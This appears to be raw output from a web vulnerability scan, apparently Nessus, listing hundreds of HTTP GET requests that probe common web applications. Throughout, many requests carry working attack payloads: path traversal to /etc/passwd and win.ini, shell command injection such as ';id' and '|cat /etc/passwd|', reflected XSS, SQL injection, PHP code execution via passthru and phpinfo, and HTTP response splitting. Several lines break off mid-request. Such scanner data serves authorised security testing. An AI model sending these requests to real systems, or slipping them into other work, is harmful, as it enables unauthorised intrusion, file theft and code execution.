GET /scripts/wgate/!?~urlmime=%22%3e%3cscript%3ealert(%22sap_its_urlmime_xss.nasl%22)%3c%2fscript%3e%3cimg%20src%3d%22 HTTP/1.1
GET /scripts/whois.cgi?action=load&whois=%3Bid HTTP/1.1
GET /scripts/whois.php?query=|id HTTP/1.1
GET /scripts/whois_raw.cgi?fqdn=%0Aid HTTP/1.1
GET /scripts/wihphoto/start.php HTTP/1.1
GET /scripts/wiki.php/<scr ipt>foo</script> HTTP/1.1
GET /scripts/wiki/edit.php?page=SandBox&suck_url=../kernel/config_inc.php&do_suck=h HTTP/1.1
GET /scripts/wiki/rankings.php HTTP/1.1
GET /scripts/wikka.php?wakka=HomePage/../../actions/wikkachanges HTTP/1.1
GET /scripts/wizard/index.php HTTP/1.1
GET /scripts/wordtrans.php?command=show_desc&advanced=1%22%3bid%3b%20true%20%22 HTTP/1.1
GET /scripts/wps_shop.cgi?action=showartikel&cat=nessus&catname=nessus&art=|id| HTTP/1.1
GET /scripts/wsasp.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /scripts/wsasp.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /scripts/wsisa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /scripts/wsisa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /scripts/wsnsa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /scripts/wsnsa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /scripts/wspd_cgi.sh/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /scripts/wspd_cgi.sh/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /scripts/www.subdomain.domain.7z HTTP/1.1
GET /scripts/www.subdomain.domain.Z HTTP/1.1
GET /scripts/www.subdomain.domain.bz2 HTTP/1.1
GET /scripts/www.subdomain.domain.gz HTTP/1.1
GET /scripts/www.subdomain.domain.jar HTTP/1.1
GET /scripts/www.subdomain.domain.tld.7z HTTP/1.1
GET /scripts/www.subdomain.domain.tld.Z HTTP/1.1
GET /scripts/www.subdomain.domain.tld.bz2 HTTP/1.1
GET /scripts/www.subdomain.domain.tld.gz HTTP/1.1
GET /scripts/www.subdomain.domain.tld.jar HTTP/1.1
GET /scripts/www.subdomain.domain.tld.rar HTTP/1.1
GET /scripts/www.subdomain.domain.tld.tar HTTP/1.1
GET /scripts/www.subdomain.domain.tld.tar.bz2 HTTP/1.1
GET /scripts/www.subdomain.domain.tld.tar.gz HTTP/1.1
GET /scripts/www.subdomain.domain.tld.tgz HTTP/1.1
GET /scripts/www.subdomain.domain.tld.war HTTP/1.1
GET /scripts/www.subdomain.domain.tld.z HTTP/1.1
GET /scripts/www.subdomain.domain.tld.zip HTTP/1.1
GET /scripts/www.subdomain.domain.rar HTTP/1.1
GET /scripts/www.subdomain.domain.tar HTTP/1.1
GET /scripts/www.subdomain.domain.tar.bz2 HTTP/1.1
GET /scripts/www.subdomain.domain.tar.gz HTTP/1.1
GET /scripts/www.subdomain.domain.tgz HTTP/1.1
GET /scripts/www.subdomain.domain.war HTTP/1.1
GET /scripts/www.subdomain.domain.z HTTP/1.1
GET /scripts/www.subdomain.domain.zip HTTP/1.1
GET /scripts/www/delivery/ac.php?bannerid=-1410938841+OR+1=1+--+';passthru(base64_decode($_SERVER[HTTP_NESSUS_ZRDBYUPC]));die;/* HTTP/1.1
GET /scripts/www/delivery/ac.php?bannerid=-350+OR+1=1 HTTP/1.1
GET /scripts/www/delivery/fc.php?MAX_type=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/wwwboard.html HTTP/1.1
GET /scripts/x_news.php HTTP/1.1
GET /scripts/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /scripts/zenworks/jsp/fw/internal/Login.jsp HTTP/1.1
GET /scripts/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /scripts/zpanel.php?page=/etc/passwd%00 HTTP/1.1
GET /scriptsadmin/index.php HTTP/1.1
GET /scriptsfaq.php?skin=../../admin/manager&tplpath=admin HTTP/1.1
GET /scriptsmultihtml.pl?multi=/etc/passwd%00html HTTP/1.1
GET /scriptssearch-results.dot?search_query=nessus%22%3e%3cscript%3ealert('dotcms_search_query_xss.nasl')%3c%2fscript%3e%2f HTTP/1.1
GET /scriptssearch_results.dot?search_query=nessus%22%3e%3cscript%3ealert('dotcms_search_query_xss.nasl')%3c%2fscript%3e%2f HTTP/1.1
GET /sdbsearch.cgi?stichwort=anything HTTP/1.1
GET /search HTTP/1.1
GET /search-results.dot?search_query=nessus%22%3e%3cscript%3ealert('dotcms_search_query_xss.nasl')%3c%2fscript%3e%2f HTTP/1.1
GET /search-ui/ HTTP/1.1
GET /search.aspx HTTP/1.1
GET /search.cfm HTTP/1.1
GET /search.cgi HTTP/1.1
GET /search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
GET /search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
GET /search.exe HTTP/1.1
GET /search.jsp?q=%25%22%3cscript%3ealert(1410938809)%3c/script%3e HTTP/1.1
GET /search.php HTTP/1.1
GET /search.php?Submit=true&search='); HTTP/1.1
GET /search.php?allwords=<br><scr ipt>foo</script>&cid=0&title=1&desc=1 HTTP/1.1
GET /search.pl HTTP/1.1
GET /search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1
GET /search/ HTTP/1.1
GET /search/results.stm HTTP/1.1
GET /search/results.stm?indexname=>\
GET /search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1
GET /search/show.pl?url=file:/etc/passwd HTTP/1.1
GET /search/show.pl?url=http://www.google.com HTTP/1.1
GET /search97/ HTTP/1.1
GET /search=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
GET /search?NS-query-pat=../../../../../../../../../etc/passwd HTTP/1.1
GET /search?NS-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
GET /search?q=http://www.nessus.org/ HTTP/1.1
GET /search_results.dot?search_query=nessus%22%3e%3cscript%3ealert('dotcms_search_query_xss.nasl')%3c%2fscript%3e%2f HTTP/1.1
GET /secret/ HTTP/1.1
GET /secure.php?cfgProgDir=/etc/passwd%00 HTTP/1.1
GET /secure/ HTTP/1.1
GET /secure/Dashboard.jspa HTTP/1.1
GET /securecgi-bin/CSUserCGI.exe?Help+00.abcd.e.fghijk\
GET /securecgi-bin/CSUserCGI.exe?Init+0 HTTP/1.1
GET /securecgi-bin/CSUserCGI.exe?ver HTTP/1.1
GET /secured/ HTTP/1.1
GET /seditio/ HTTP/1.1
GET /segue/ HTTP/1.1
GET /seguecms/ HTTP/1.1
GET /self_upgrade.html HTTP/1.1
GET /sell/ HTTP/1.1
GET /sendcard.php?view=1&id=%27sendcard_sql.nasl HTTP/1.1
GET /sendtemp.pl?templ=../../../../../etc/passwd HTTP/1.1
GET /serve/ HTTP/1.1
GET /server-info HTTP/1.1
GET /server-info/ HTTP/1.1
GET /server-status HTTP/1.1
GET /server-status/ HTTP/1.1
GET /server.pt?in_ra_groupoperator_1=and&in_hi_userid=1&in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_groupoperator_1=and&parentid=1&in_hi_req_apps=1&cached=false&control=advancedstart&in_hi_revealed_1=0&in_hi_req_page=10&in_hi_depth_1=0&in_hi_totalgroups=1&parentname=AdvancedSearch&in_ra_topoperator=and HTTP/1.1
GET /server.pt?open=space&name=%22%3b%7d%3c%2fscript%3e%3cscript%3ealert('plumtree_name_xss.nasl')%3c%2fscript%3e HTTP/1.1
GET /server/s3_download.php HTTP/1.1
GET /server_stats/ HTTP/1.1
GET /servers/ HTTP/1.1
GET /serverstats/ HTTP/1.1
GET /service/ HTTP/1.1
GET /services/ HTTP/1.1
GET /services/Walrus HTTP/1.1
GET /services/help/?module=horde&show=about HTTP/1.1
GET /services/help/?module=horde&show=menu HTTP/1.1
GET /servicio/ HTTP/1.1
GET /servicios/ HTTP/1.1
GET /servlet/ HTTP/1.1
GET /servlet/ContentServer HTTP/1.1
GET /servlet/ServletManager HTTP/1.1
GET /servlet/SnoopServlet/ HTTP/1.1
GET /servlet/UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin HTTP/1.1
GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0
GET /servlet/com.newatlanta.servletexec.JSP10Servlet HTTP/1.1
GET /servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa HTTP/1.1
GET /servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp HTTP/1.1
GET /servlet/snoop/ HTTP/1.1
GET /servlet/snoopservlet/ HTTP/1.1
GET /servlet/webacc HTTP/1.1
GET /servlet/webacc?User.lang=<scr ipt>foo</script> HTTP/1.1
GET /servlet/webacc?error=webacc HTTP/1.1
GET /servlets-examples/ HTTP/1.1
GET /servlets/ HTTP/1.1
GET /session/ HTTP/1.1
GET /session/login.php?dest=nessus%22%3e%3cscript%3ealert('ossim_dest_xss.nasl')%3c%2fscript%3e%3c!--%20 HTTP/1.1
GET /sessionmanager/ HTTP/1.1
GET /sessionmanager/login.jsp HTTP/1.1
GET /setcookie.php?u=../../../../../../../../../../../../etc/passwd%00&plugin=pblang_mult_flaws.nasl HTTP/1.1
GET /settemplate.php HTTP/1.1
GET /settings/site.ini HTTP/1.1
GET /setup.php HTTP/1.1
GET /setup/ HTTP/1.1
GET /setup/setup-/../../log.jsp?log=info&mode=asc&lines=10 HTTP/1.1
GET /sf/docman/new.php HTTP/1.1
GET /sf/patch/index.php HTTP/1.1
GET /sfm/fm.php HTTP/1.1
GET /sgb/superguestconfig HTTP/1.1
GET /sgdadmin/faces/jsp/Version.jsp HTTP/1.1
GET /sgdynamo.exe?HTNAME=<scr ipt>foo</script> HTTP/1.1
GET /sgdynamo.exe?HTNAME=sgdynamo.exe HTTP/1.1
GET /sgms/login HTTP/1.1
GET /share/ HTTP/1.1
GET /shared/ HTTP/1.1
GET /shared/help.php?page=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /shared/userlogin.php HTTP/1.1
GET /shell-cgi/ HTTP/1.1
GET /shipping/ HTTP/1.1
GET /shop.plx HTTP/1.1
GET /shop.plx/page=nessus701209777 HTTP/1.1
GET /shop/ HTTP/1.1
GET /shop/normal_html.cgi?file=|id| HTTP/1.1
GET /shop/psunami.cgi?file=|id| HTTP/1.1
GET /shopaddtocart.asp?productid='42 HTTP/1.1
GET /shopexd.asp?catalogid='42 HTTP/1.1
GET /shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1
GET /shopper/ HTTP/1.1
GET /shopping/ HTTP/1.1
GET /shopscript/ HTTP/1.1
GET /shoutbox.php?conf=../ HTTP/1.1
GET /shoutbox.php?conf=../../../../../../../../etc/passwd HTTP/1.1
GET /showcat.php?cat=1' HTTP/1.1
GET /showproduct.php?product=1' HTTP/1.1
GET /shr-cgi-bin/ HTTP/1.1
GET /silverstripe/ HTTP/1.1
GET /simpgb/ HTTP/1.1
GET /simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1
GET /simplebbs/ HTTP/1.1
GET /simplog/ HTTP/1.1
GET /site/ HTTP/1.1
GET /site_sift/ HTTP/1.1
GET /siteadmin/ HTTP/1.1
GET /sitebuilder/ HTTP/1.1
GET /sitebuildercontent/ HTTP/1.1
GET /sitebuilderfiles/ HTTP/1.1
GET /sitebuilderpictures/ HTTP/1.1
GET /sitecore/login/Default.aspx HTTP/1.1
GET /siteframe.php?LOCAL_PATH=macros/100-siteframe.macro%00 HTTP/1.1
GET /sitemap.xml HTTP/1.1
GET /sitemap/sitemap.xml HTTP/1.1
GET /sitemgr/ HTTP/1.1
GET /siteminder/ HTTP/1.1
GET /siteminderagent/ HTTP/1.1
GET /sites/ HTTP/1.1
GET /siteserver/ HTTP/1.1
GET /sitesift/ HTTP/1.1
GET /sitestats/ HTTP/1.1
GET /siteupdate/ HTTP/1.1
GET /slide/ HTTP/1.1
GET /sm HTTP/1.1
GET /sm/ HTTP/1.1
GET /smadmr5.nsf HTTP/1.1
GET /smartermail/ HTTP/1.1
GET /smb2www.pl HTTP/1.1
GET /smconf.nsf HTTP/1.1
GET /smency.nsf HTTP/1.1
GET /smf/ HTTP/1.1
GET /smftypes.nsf HTTP/1.1
GET /smhelp.nsf HTTP/1.1
GET /smmsg.nsf HTTP/1.1
GET /smpwservicescgi.exe HTTP/1.1
GET /smquar.nsf HTTP/1.1
GET /smreports/ HTTP/1.1
GET /smreportsviewer/ HTTP/1.1
GET /smsmvlog.nsf HTTP/1.1
GET /smtime.nsf HTTP/1.1
GET /snitz/ HTTP/1.1
GET /snmx-cgi/ HTTP/1.1
GET /snmx-cgi/fxm.exe HTTP/1.1
GET /snoop/ HTTP/1.1
GET /snoopservlet/ HTTP/1.1
GET /snpfiltered.pl?t=c&u=<scr ipt>foo</script> HTTP/1.1
GET /soap/ HTTP/1.1
GET /soapdocs/ HTTP/1.1
GET /socialengine/ HTTP/1.1
GET /socialnetwork/ HTTP/1.1
GET /software/ HTTP/1.1
GET /sojourn.cgi?cat=../../../../../etc/passwd%00 HTTP/1.1
GET /solaris/ HTTP/1.1
GET /solutions/ HTTP/1.1
GET /someunexistantantsutff.exe HTTP/1.1
GET /someunexistantantsutff1371797927743218010.html HTTP/1.1
GET /source/ HTTP/1.1
GET /source?v=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /sources/functions.php?root_path=/etc/passwd%00 HTTP/1.1
GET /spaw/dialogs/confirm.php?spaw_root=/etc/passwd%00 HTTP/1.1
GET /sphider/ HTTP/1.1
GET /sphpblog/ HTTP/1.1
GET /spip/ HTTP/1.1
GET /spt/ HTTP/1.1
GET /spywall/login.php HTTP/1.1
GET /sql-ledger/ HTTP/1.1
GET /sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
GET /sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
GET /sql/ HTTP/1.1
GET /sql/install-0.9.7.php?p=2 HTTP/1.1
GET /sqlite/ HTTP/1.1
GET /sqlitemanager/ HTTP/1.1
GET /squid/ HTTP/1.1
GET /squirrelcart/ HTTP/1.1
GET /squirrelcart/cart_content.php?cart_isp_root=/etc/passwd%00 HTTP/1.1
GET /squirrelmail/ HTTP/1.1
GET /sqwebmail?redirect=%0d%0a%0d%0asqwebmail_http_splitting.nasl HTTP/1.1
GET /src/ HTTP/1.1
GET /src/login.php HTTP/1.1
GET /src/redirect.php HTTP/1.1
GET /srchadm/ HTTP/1.1
GET /ssi/ HTTP/1.1
GET /ssi/envout.bat?|type%20c:\\windows\\win.ini HTTP/1.1
GET /ssi/envout.bat?|type%20c:\\winnt\\win.ini HTTP/1.1
GET /ssl/ HTTP/1.1
GET /sslkeys/ HTTP/1.1
GET /staff/ HTTP/1.1
GET /staging/welcome.action HTTP/1.1
GET /starnet/addons/slideshow_full.php?album_name='676200956 HTTP/1.1
GET /starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd%00 HTTP/1.1
GET /start.action HTTP/1.1
GET /start.js HTTP/1.1
GET /stat/ HTTP/1.1
GET /stat/awstatstotals.php?sort=\
GET /stat/awstatstotals.php?sort={%24{passthru(chr(105).chr(100))}}{%24{exit()}} HTTP/1.1
GET /stat/awstatstotals.php?sort={%24{phpinfo()}}{%24{exit()}} HTTP/1.1
GET /statistic/ HTTP/1.1
GET /statistics/ HTTP/1.1
GET /stats-bin-p/ HTTP/1.1
GET /stats/ HTTP/1.1
GET /stats_old/ HTTP/1.1
GET /status HTTP/1.1
GET /status.php3 HTTP/1.1
GET /status.xsl. HTTP/1.1
GET /status/ HTTP/1.1
GET /stcenter.nsf HTTP/1.1
GET /std.html HTTP/1.1
GET /storage/ HTTP/1.1
GET /store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1
GET /store.php?crn=42'&action=show&show_products_mode=cat_click HTTP/1.1
GET /store/ HTTP/1.1
GET /storemgr/ HTTP/1.1
GET /story.pl?next=../../../../../etc/passwd%00 HTTP/1.1
GET /stream/0 HTTP/1.1
GET /stronghold-info HTTP/1.1
GET /stronghold-info/ HTTP/1.1
GET /stronghold-status HTTP/1.1
GET /stronghold-status/ HTTP/1.1
GET /struts-cookbook/processSimple.do HTTP/1.1
GET /struts-examples/upload/upload-submit.do HTTP/1.1
GET /stuff/ HTTP/1.1
GET /style/ HTTP/1.1
GET /styles.php?toroot=/etc/passwd%00 HTTP/1.1
GET /styles/ HTTP/1.1
GET /stylesheet/ HTTP/1.1
GET /stylesheets/ HTTP/1.1
GET /subir/ HTTP/1.1
GET /subsystems/permissions.info.php HTTP/1.1
GET /sugar/ HTTP/1.1
GET /sugarcrm/ HTTP/1.1
GET /sugarcrm/modules/Users/Login.php?theme=../../../../../../../etc/passwd%00 HTTP/1.1
GET /sugarsuite/ HTTP/1.1
GET /sun/ HTTP/1.1
GET /super_stats/ HTTP/1.1
GET /superguestconfig HTTP/1.1
GET /support-center/ HTTP/1.1
GET /support/ HTTP/1.1
GET /support/helpdesk/ HTTP/1.1
GET /supporter/ HTTP/1.1
GET /supporter/tupdate.php?groupid=change&sg=' HTTP/1.1
GET /supportsuite/ HTTP/1.1
GET /survey.inc.php?path=/etc/passwd%00 HTTP/1.1
GET /survey/ HTTP/1.1
GET /surveys/ HTTP/1.1
GET /swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
GET /sws/data/sws_data.js HTTP/1.1
GET /swsbobje/ HTTP/1.1
GET /symantec.jsp HTTP/1.1
GET /sympa/ HTTP/1.1
GET /symphony/ HTTP/1.1
GET /sys/ HTTP/1.1
GET /sysadmin/ HTTP/1.1
GET /sysbackup/ HTTP/1.1
GET /sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id HTTP/1.1
GET /sysinfo/ HTTP/1.1
GET /syslog.htm HTTP/1.1
GET /system/ HTTP/1.1
GET /system/console?version=1.5 HTTP/1.1
GET /system/login HTTP/1.1
GET /tar/ HTTP/1.1
GET /tarantella/ HTTP/1.1
GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=bootstrap HTTP/1.1
GET /tarjetas/ HTTP/1.1
GET /tasktracker.jsp HTTP/1.1
GET /tdbin/ HTTP/1.1
GET /te_html/ HTTP/1.1
GET /teaming/ HTTP/1.1
GET /tech/ HTTP/1.1
GET /technote/ HTTP/1.1
GET /temp/ HTTP/1.1
GET /template/ HTTP/1.1
GET /templates/ HTTP/1.1
GET /temporal/ HTTP/1.1
GET /test-cgi/ HTTP/1.1
GET /test-cgi?* HTTP/1.0
GET /test.bat?|type%20c:\\windows\\win.ini HTTP/1.1
GET /test.bat?|type%20c:\\winnt\\win.ini HTTP/1.1
GET /test.php HTTP/1.1
GET /test/ HTTP/1.1
GET /testing/ HTTP/1.1
GET /testlink/ HTTP/1.1
GET /tests/ HTTP/1.1
GET /tests/test_tools/selenium/core/SeleniumLog.html HTTP/1.1
GET /testsite/typo3/ HTTP/1.1
GET /testweb/ HTTP/1.1
GET /texis.exe/?-dump HTTP/1.1
GET /texis.exe/nessus HTTP/1.1
GET /themes/ HTTP/1.1
GET /themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1
GET /things/ HTTP/1.1
GET /this_page_should_not_exist.htm HTTP/1.1
GET /this_server/all_settings.shtml HTTP/1.1
GET /thyme/ HTTP/1.1
GET /ticket/ HTTP/1.1
GET /tickets/ HTTP/1.1
GET /tigercrm/ HTTP/1.1
GET /tightvnc-jviewer.jar HTTP/1.1
GET /tiki-index.php HTTP/1.1
GET /tiki/ HTTP/1.1
GET /tinfo.php?id=1410939053 HTTP/1.1
GET /tinybrowser/upload.php?badfiles=1><scr ipt>alert('tinybrowser_multiple_xss.nasl')</script> HTTP/1.1
GET /tinywebgallery/ HTTP/1.1
GET /tmp/ HTTP/1.1
GET /tmui/ HTTP/1.1
GET /tomcat-docs/index.html HTTP/1.1
GET /tomcat_proxy_directory_traversal.nasl1410939029 HTTP/1.1
GET /tools/ HTTP/1.1
GET /top.html HTTP/1.1
GET /top.php?header=../../../../../../../../etc/passwd HTTP/1.1
GET /topic.php?tid='select HTTP/1.1
GET /toplist/ HTTP/1.1
GET /topology/dynamicViews.jar HTTP/1.1
GET /topsite/ HTTP/1.1
GET /topsites/ HTTP/1.1
GET /tor/ HTTP/1.1
GET /tpv/ HTTP/1.1
GET /trabajo/ HTTP/1.1
GET /trac/ HTTP/1.1
GET /trace.axd HTTP/1.1
GET /track/ HTTP/1.1
GET /tracking/ HTTP/1.1
GET /trade.php HTTP/1.1
GET /transito/ HTTP/1.1
GET /transpolar/ HTTP/1.1
GET /tree.php HTTP/1.1
GET /tree/ HTTP/1.1
GET /trees/ HTTP/1.1
GET /tst.bat|type%20c:\\windows\\win.ini HTTP/1.1
GET /tst.bat|type%20c:\\winnt\\win.ini HTTP/1.1
GET /tsweb.asp HTTP/1.1
GET /tsweb/ HTTP/1.1
GET /ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1
GET /ttforum/ HTTP/1.1
GET /ttx.cgi HTTP/1.1
GET /turba/ HTTP/1.1
GET /twg/ HTTP/1.1
GET /twiki/bin/ HTTP/1.1
GET /typo3/ HTTP/1.1
GET /typo3/index.php HTTP/1.1
GET /typolight/ HTTP/1.1
GET /ubbthreads.php HTTP/1.1
GET /ubbthreads/ HTTP/1.1
GET /uebimiau/ HTTP/1.1
GET /ui/login/ HTTP/1.1
GET /unauthenticated/..%01/..%01/..%01/..%01/var/user_def/ad.conf HTTP/1.1
GET /upb/ HTTP/1.1
GET /upb/db/users.dat HTTP/1.1
GET /update.php HTTP/1.1
GET /update.php?op=info HTTP/1.1
GET /updates/ HTTP/1.1
GET /upgrade/index.php HTTP/1.1
GET /upgradev1.php HTTP/1.1
GET /upload.cgi HTTP/1.1
GET /upload/ HTTP/1.1
GET /upload/upload-submit.do HTTP/1.1
GET /uploads/ HTTP/1.1
GET /urchin/ HTTP/1.1
GET /urchin3/ HTTP/1.1
GET /urchin5/ HTTP/1.1
GET /us/ HTTP/1.1
GET /usage/ HTTP/1.1
GET /user.cgi?url=\
GET /user.php HTTP/1.1
GET /user/ HTTP/1.1
GET /user_settings.cfg HTTP/1.1
GET /userdb/ HTTP/1.1
GET /users/ HTTP/1.1
GET /users/users.php HTTP/1.1
GET /usr/ HTTP/1.1
GET /usrdetails.php?sgnuptype=csaleID<scr ipt>nessus</script> HTTP/1.1
GET /ustats/ HTTP/1.1
GET /ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1
GET /usuario/ HTTP/1.1
GET /usuarios/ HTTP/1.1
GET /util/ HTTP/1.1
GET /utils/ HTTP/1.1
GET /v4/ HTTP/1.1
GET /vF0zw48F.soap HTTP/1.1
GET /vcard/ HTTP/1.1
GET /vcards/ HTTP/1.1
GET /vfs/ HTTP/1.1
GET /vhcs2/ HTTP/1.1
GET /vhost.php?action=logout&time=1410938659 HTTP/1.1
GET /viart_shop.xml HTTP/1.1
GET /vicidial/ HTTP/1.1
GET /vicidial/admin.php HTTP/1.1
GET /view.html HTTP/1.1
GET /view.php?PG=foobar HTTP/1.1
GET /view/System/WebHome?rev=1 HTTP/1.1
GET /view/TWiki/WebHome HTTP/1.1
GET /view/hsrindex.shtml HTTP/1.1
GET /view/view.shtml HTTP/1.1
GET /view_user.php?list=1&letter=&sort_by='select HTTP/1.1
GET /viewcvs.cgi/ HTTP/1.1
GET /viewcvs.cgi/?cvsroot=<scr ipt>foo</script> HTTP/1.1
GET /viewpage.php?file=/etc/passwd HTTP/1.1
GET /viewvc.cgi/ HTTP/1.1
GET /viewvc/ HTTP/1.1
GET /vncviewer.jar HTTP/1.1
GET /vpopmail/README HTTP/1.1
GET /vsmc.html HTTP/1.1
GET /vtiger/ HTTP/1.1
GET /w-agora/ HTTP/1.1
GET /w3perl/ HTTP/1.1
GET /wa.cgi?DEBUG-SHOW-VERSION HTTP/1.1
GET /wa.exe?DEBUG-SHOW-VERSION HTTP/1.1
GET /wa?DEBUG-SHOW-VERSION HTTP/1.1
GET /wanipconn-361.xml HTTP/1.1
GET /wavemaker/ HTTP/1.1
GET /wavemaster.internal HTTP/1.1
GET /wavemaster.internal/ HTTP/1.1
GET /way-board/ HTTP/1.1
GET /way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1
GET /wb/ HTTP/1.1
GET /wbboard/ HTTP/1.1
GET /wc.dll?wwMaint~EditConfig HTTP/1.1
GET /wconnect/wc.dll?wwMaint~EditConfig HTTP/1.1
GET /web-console/ServerInfo.jsp HTTP/1.1
GET /web-console/ServerInfo.jsp%00 HTTP/1.1
GET /web-determinations/?CookieSet=true HTTP/1.1
GET /web/ HTTP/1.1
GET /web800fo/ HTTP/1.1
GET /webMathematica/ HTTP/1.1
GET /web_usage/ HTTP/1.1
GET /webaccess/ HTTP/1.1
GET /webadmin.php?show=%2Fetc%2Fpasswd HTTP/1.1
GET /webadmin/ HTTP/1.1
GET /webalizer/ HTTP/1.1
GET /webapp/home.html?0 HTTP/1.1
GET /webappmon.exe?ins=nowait&act=natping&sel=%22255.255.255.255%20%26%20id%26%22 HTTP/1.1
GET /webapps/ HTTP/1.1
GET /webapps/login/index.html HTTP/1.1
GET /webboard/ HTTP/1.1
GET /webboard/generate.cgi HTTP/1.1
GET /webc.cgi/ HTTP/1.1
GET /webcart-lite/ HTTP/1.1
GET /webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD HTTP/1.1
GET /webcart/ HTTP/1.1
GET /webct/about.jsp HTTP/1.1
GET /webdata/ HTTP/1.1
GET /webdb/ HTTP/1.1
GET /webdist.cgi?distloc=;id HTTP/1.1
GET /webftp/ HTTP/1.1
GET /webgallery/ HTTP/1.1
GET /webglimpse.cgi HTTP/1.1
GET /webhost HTTP/1.1
GET /webimages/ HTTP/1.1
GET /webimages2/ HTTP/1.1
GET /webinsta/ HTTP/1.1
GET /webl/index.html HTTP/1.1
GET /weblog/ HTTP/1.1
GET /weblogs/ HTTP/1.1
GET /webmail/ HTTP/1.1
GET /webman/info.cgi?host= HTTP/1.1
GET /webmaster/ HTTP/1.1
GET /webmaster_logs/ HTTP/1.1
GET /webplus.exe?script=webplus_install_path.nasl HTTP/1.1
GET /webplus?script=/../../../../etc/passwd HTTP/1.1
GET /webpub-ui/ HTTP/1.1
GET /webpub/ HTTP/1.1
GET /webreports/ HTTP/1.1
GET /webreps/ HTTP/1.1
GET /webshare/ HTTP/1.1
GET /website/ HTTP/1.1
GET /webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd HTTP/1.1
GET /webstat/ HTTP/1.1
GET /webstats/ HTTP/1.1
GET /webthings/ HTTP/1.1
GET /webtrace/ HTTP/1.1
GET /webtrends/ HTTP/1.1
GET /webwho.pl HTTP/1.1
GET /welcome.action HTTP/1.1
GET /welcome.php?custom_welcome_page=/etc/passwd%00 HTTP/1.1
GET /whois.cgi?action=load&whois=%3Bid HTTP/1.1
GET /whois.php?query=|id HTTP/1.1
GET /whois_raw.cgi?fqdn=%0Aid HTTP/1.1
GET /wihphoto/start.php HTTP/1.1
GET /wiki.php/<scr ipt>foo</script> HTTP/1.1
GET /wiki/ HTTP/1.1
GET /wiki/?title=Special:Recentchanges&feed=atom HTTP/1.1
GET /wiki/RELEASE-NOTES HTTP/1.1
GET /wiki/bin/ HTTP/1.1
GET /wiki/edit.php?page=SandBox&suck_url=../kernel/config_inc.php&do_suck=h HTTP/1.1
GET /wiki/index.php HTTP/1.1
GET /wiki/mw-config HTTP/1.1
GET /wiki/rankings.php HTTP/1.1
GET /wikka.php?wakka=HomePage/../../actions/wikkachanges HTTP/1.1
GET /wikka/ HTTP/1.1
GET /windows/ HTTP/1.1
GET /wizard/index.php HTTP/1.1
GET /word/ HTTP/1.1
GET /wordpress/ HTTP/1.1
GET /wordtrans.php?command=show_desc&advanced=1%22%3bid%3b%20true%20%22 HTTP/1.1
GET /wordtrans/ HTTP/1.1
GET /work/ HTTP/1.1
GET /wps/portal_dojo/layerLoader.jsp?path=file:///etc/passwd%00 HTTP/1.1
GET /wps/portal_dojo/layerLoader.jsp?path=file:/etc/passwd%00 HTTP/1.1
GET /wps/wcm/webinterface/login/login.jsp?\
